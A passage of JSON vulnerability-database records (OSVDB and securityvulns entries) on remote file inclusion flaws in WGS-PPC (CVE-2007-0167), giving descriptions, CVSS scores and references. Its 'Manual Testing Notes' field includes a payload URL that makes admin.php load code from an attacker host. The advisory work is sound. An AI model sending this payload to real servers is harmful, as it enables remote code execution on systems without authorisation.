http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33446", "id": "OSVDB:33446", "title": "WGS-PPC (PPC Search Engine) config/config_member.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/admini/admin.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33448", "id": "OSVDB:33448", "title": "WGS-PPC (PPC Search Engine) admini/admin.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-0159", "CVE-2007-0192", "CVE-2007-0154", "CVE-2007-0181", "CVE-2007-0143", "CVE-2007-0176", "CVE-2007-0189", "CVE-2007-0182", "CVE-2007-0149", "CVE-2007-0167", "CVE-2007-0156", "CVE-2007-0205", "CVE-2007-0151", "CVE-2007-0191", "CVE-2007-0155", "CVE-2007-0150", "CVE-2007-0112", "CVE-2007-0194", "CVE-2007-0153", "CVE-2007-0202"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-01-09T00:00:00", "published": "2007-01-09T00:00:00", "id": "SECURITYVULNS:VULN:7020", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7020", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}